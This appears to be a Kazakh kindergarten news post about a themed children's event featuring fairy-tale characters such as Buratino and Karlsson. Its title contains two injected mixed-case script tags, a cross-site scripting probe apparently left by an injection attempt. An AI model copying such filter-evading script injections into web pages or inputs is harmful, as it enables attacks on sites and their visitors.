Таңғажайып алаңына сүйікті кейіпкерлермен саяхат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.06.2020
Бүгін балабақшада телефон шырылдады. Ортаңғы және ересек балалары Буратинодан таңғажайып алаңына шақыру алды. Балалар өзімен бірге ептілік, батылдық және жақсы көңіл күйді ала жүріп, саяхатқа аттанды. Жолда Карлсонды кездестіріп, торт ұсынып, Айболит дәрігерде сауықтыратын массаж жасады. Ал гүл қаланың көңілді тұрғыны Дымбілмес жұмбақ жасырды. Буратино қызықты сергіту сəтін өткізді. Балалар қиыншылықтардан өтіп, Таңғажайып алаңына жетті. Ол жерде тосынсыйы бар таңғажайып ағаш тауып алды. Мереке керемет болды!





